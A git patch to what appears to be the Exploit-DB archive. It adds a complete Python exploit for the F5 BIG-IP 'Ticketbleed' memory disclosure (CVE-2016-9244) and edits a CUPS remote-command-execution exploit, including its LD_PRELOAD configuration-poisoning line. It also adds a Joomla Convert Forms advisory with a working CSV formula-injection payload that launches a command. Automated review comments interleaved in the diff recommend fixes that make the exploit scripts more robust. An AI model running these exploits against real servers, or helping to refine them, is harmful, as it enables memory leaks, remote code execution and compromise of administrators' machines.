From a8b515dd6de24e57dd8fec47781c4139fdefb60c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 13 Apr 2018 05:01:51 +0000
Subject: [PATCH] DB: 2018-04-13 3 changes to exploits/shellcodes F5 BIG-IP SSL Virtual Server - Memory Disclosure F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)
---
 exploits/hardware/remote/44446.py | 152 ++++++++++++++++++++++++++++++
 exploits/linux/remote/41233.py | 14 ++-
 exploits/php/webapps/44447.txt | 30 ++++++
 files_exploits.csv | 4 +-
 4 files changed, 194 insertions(+), 6 deletions(-)
 create mode 100755 exploits/hardware/remote/44446.py
 create mode 100644 exploits/php/webapps/44447.txt

diff --git a/exploits/hardware/remote/44446.py b/exploits/hardware/remote/44446.py
new file mode 100755
index 000000000..9f150633a
--- /dev/null
+++ b/exploits/hardware/remote/44446.py
@@ -0,0 +1,152 @@ +# -*- coding: utf-8 -*- +#!/usr/bin/python +# Exploit Title: Ticketbleed +# Google Dork: n/a +# Date: Exploit: 02/13/17, Advisory Published: 02/09/17 +# Exploit Author: @0x00string +# Vendor Homepage: https://f5.com/ +# Software Link: https://support.f5.com/csp/article/K05121675 +# Version: see software link for versions +# Tested on: F5 BIGIP 11.6 +# CVE : CVE-2016-9244 +# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls) +import re, getopt, sys, socket +from struct import * +try: + from scapy_ssl_tls.ssl_tls import * +except ImportError: + from scapy.layers.ssl_tls import * + +def banner(): + print ''' + lol ty filippo! + ty tintinweb! + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 + @0x00string +https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py +''' + +def usage (): + print ("python script.py \n" + " -h, --help: Show this message\n" + " -a, --rhost: Target IP address\n" + " -b, --rport: Target port\n" + "\n\n" + "Examples:\n" + "python script.py -a 10.10.10.10 -b 443\n" + "python script.py --rhost 10.10.10.10 --rport 8443") + exit() + +def pretty (t, m): + if (t is "+"): + print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n", + elif (t is "-"): + print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n", + elif (t is "*"): + print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n", + elif (t is "!"): + print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n", + +def createDump (input): + d, b, h = '', [], [] + u 
= list(input) + for e in u: + h.append(e.encode("hex")) + if e == '0x0': + b.append('0') + elif 30 > ord(e) or ord(e) > 128: + b.append('.') + elif 30 < ord(e) or ord(e) < 128: + b.append(e) + + i = 0 + while i < len(h): + if (len(h) - i ) >= 16: + d += ' '.join(h[i:i+16]) + d += " " + d += ' '.join(b[i:i+16]) + d += "\n" + i = i + 16 + else: + d += ' '.join(h[i:(len(h) - 0 )]) + pad = len(' '.join(h[i:(len(h) - 0 )])) + d += ' ' * (56 - pad) + d += ' '.join(b[i:(len(h) - 0 )]) + d += "\n" + i = i + len(h) + return d + +def ticketBleed (rhost, rport): + h = (rhost,int(rport)); + version = TLSVersion.TLS_1_2 + secret = "" + session_ticket = "" + sid = "" + cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA + with TLSSocket(socket.socket(), client=True) as sock: + sock.connect(h) + ctx = sock.tls_ctx + packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")]) + sock.sendall(packet) + sock.recvall() + packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data() + packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec() + sock.sendall(TLS.from_records([packet_ke, packet_ccs])) + sock.sendall(to_raw(TLSFinished(), ctx)) + ret = sock.recvall() + session_ticket = ret[TLSSessionTicket].ticket + secret = ctx.master_secret + #pretty("*", "ctx 1: \n" + str(ctx)) + with TLSSocket(socket.socket(), client=True) as sock: + sock.connect(h) + ctx = sock.tls_ctx + packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)]) + sock.tls_ctx.resume_session(secret) + sock.sendall(packet) + ret = sock.recvall() + sid = ret[TLSServerHello].session_id + #pretty("*", "ctx 2: \n" + str(ctx)) + pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid)) + +def main(): + rhost = None; + 
rport = None; + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',]) + for opt, arg in options: + if opt in ('-h', '--help'): + usage() + elif opt in ('-a','--rhost'): + rhost = arg; + elif opt in ('-b','--rport'): + rport = arg; + banner() + if rhost is None or rport is None: + usage() + ticketBleed(rhost,rport) + exit(0); + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/linux/remote/41233.py b/exploits/linux/remote/41233.py index 10ebec8bb..b338b9a05 100755 --- a/exploits/linux/remote/41233.py +++ b/exploits/linux/remote/41233.py @@ -40,7 +40,7 @@ def banner(): 000 0000000000000000000 0000000000000 @0x00string -github.com/0x00string/oldays/CVE-2015-1158.py +https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py ''' def usage (): @@ -140,10 +140,13 @@ def locatePrinters(rhost, rport="631"): if m is not None: printer = m.group(1) pretty("+","printer found: " + printer) + return printer + else: + pretty("-","no printers") + exit(1) else: pretty("-","no printers") exit(1) - return printer def preparePayload(libpath): with open(libpath, 'rb') as f: @@ -226,7 +229,7 @@ def seedTarget(rhost, rport, printer, payload): "\x0d\x0a") sendJobRequest = http_header2 + send_document_packet - blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest) + blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest) pretty("*","\n" + createDump(blah) + "\n") pretty("*","job id: " + jobid) return jobid 
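Review bot: The getopt spec `'a:b:h:'` in main() declares `-h` as taking an argument, so a bare `-h` raises getopt.GetoptError with a traceback instead of reaching usage(); this same commit fixes exactly that in 41233.py's main() (`'a:b:c:fh'`), and the new file should use `'a:b:h'` too. The getopt call is also unguarded in both files, so an unknown option likewise ends in a traceback rather than the usage text; wrapping it as `try: options, remainder = getopt.getopt(...)` / `except getopt.GetoptError: usage()` keeps the user-facing behaviour consistent. Separately, createDump's `if e == '0x0':` compares a one-character string with a four-character literal and can never match (presumably `'\x00'` was meant), so that branch is dead, and the following `elif 30 < ord(e) or ord(e) < 128:` is always true once reached and can simply be `else:`. pretty() compares strings with identity (`if (t is "+"):`), which only works because CPython interns short literals and should be `==`.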
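Review bot: The added inner `else` in locatePrinters repeats the outer `else` verbatim (`pretty("-","no printers")` then `exit(1)`), so the two no-printer paths can now drift apart; one shared failure path followed by `return printer` — or a tiny helper such as `def noPrinters(): pretty("-","no printers"); exit(1)` — keeps a single copy. `exit(1)` is the site-module convenience and is absent under `python -S`; `sys.exit(1)` is the portable form since sys is already used by main(). locatePrinters begins before the hunk, so the outer condition is not visible here.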
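Review bot: The new `blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)` is immediately followed by `pretty("*","\n" + createDump(blah) + "\n")`, which dumps `blah` rather than `blah2`, so the response to this request is never shown and blah2 is unused within the hunk; unless that is deliberate the dump line should read `createDump(blah2)`. The port typing is also inconsistent across the file: this line applies `int(rport)` while putConfig's `txrx(rhost,rport,"tcp",…)` in the later hunk passes rport unchanged, so txrx's expected type should be settled in one place. seedTarget starts before the hunk and `blah` is presumably assigned there.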
@@ -478,13 +481,14 @@ def putConfig(rhost, rport, config): pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config))) def poisonConfig(config, name): - config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a" + config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a" return config def main(): rhost = None; + rport = None; noshell = None; - options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',]) + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help']) for opt, arg in options: if opt in ('-h', '--help'): usage() diff --git a/exploits/php/webapps/44447.txt b/exploits/php/webapps/44447.txt new file mode 100644 index 000000000..565eca5b6 --- /dev/null +++ b/exploits/php/webapps/44447.txt 
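Review bot: `rport = None;` is added to main() while locatePrinters declares `rport="631"` as its default, so unless main() later substitutes a value (not visible in this hunk) omitting `-b` leaves rport as None and the `int(rport)` call in seedTarget raises TypeError; initialising it as `rport = "631";` here would match the function default. The trailing semicolons on the three assignments are not Python style and are dropped by any formatter. main() continues past the end of the hunk.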
@@ -0,0 +1,30 @@
+# Exploit Title: Joomla Extension Convert Forms version 2.0.3 - Formula Injection (CSV Injection)
+# Google Dork: N/A
+# Date: 12-04-2018
+################################
+# Exploit Author: Jetty Sairam
+################################
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
+# Affected Version: 2.03 and before
+#Category: Plugins and Extensions
+# Tested on: WiN7_x64
+# CVE : CVE-2018-10063
+
+1. Application Description:
+ Convert Forms provides a framework to build custom forms for Joomla users.
+
+2. Technical Description:
+Custom Forms version 2.0.3 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
+
+3. Proof Of Concept:
+Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
+When high privileged user logs into the application to export form data in CSV and opens the file.
+Formula gets executed and calculator will get popped in his machine.
+
+4. Solution:
+Upgrade to version 2.0.4
+https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/convert-forms/
+
+5. Reference:
+https://www.tassos.gr/blog/convert-forms-2-0-4-security-release
+https://vel.joomla.org/articles/2140-introducing-csv-injection
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 748b2e346..06a3f771d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
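Review bot: The header line `# Affected Version: 2.03 and before` disagrees with the version form used everywhere else in the file (the title's `2.0.3`, the fix `2.0.4` in section 4 and the linked 2-0-4 release note), so it should read `# Affected Version: 2.0.3 and before`. Section 2 labels the issue "Remote Command Execution", but the text itself describes a formula injection that only runs when a privileged user opens the exported CSV in a spreadsheet application on their own machine, so a client-side classification such as "Formula Injection (CSV Injection)" — the one the title already uses — is the accurate description for anyone triaging it. "Custom Forms" at the start of section 2 should be "Convert Forms", the product named in the title and in section 1.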
@@ -16086,7 +16086,7 @@ id,file,description,date,author,type,platform,port
 41233,exploits/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,remote,linux,
 41236,exploits/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,remote,hardware,
 41297,exploits/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,remote,multiple,
-41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
+41298,exploits/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-10,"Ege Balci",remote,hardware,
 41358,exploits/php/remote/41358.rb,"Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,remote,php,80
 41366,exploits/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",remote,java,
 41436,exploits/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Remote Buffer Overflow (SEH)",2017-02-22,"Peter Baris",remote,windows,
@@ -16389,6 +16389,7 @@ id,file,description,date,author,type,platform,port
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
+44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39141,3 +39142,4 @@ id,file,description,date,author,type,platform,port
 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
+44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,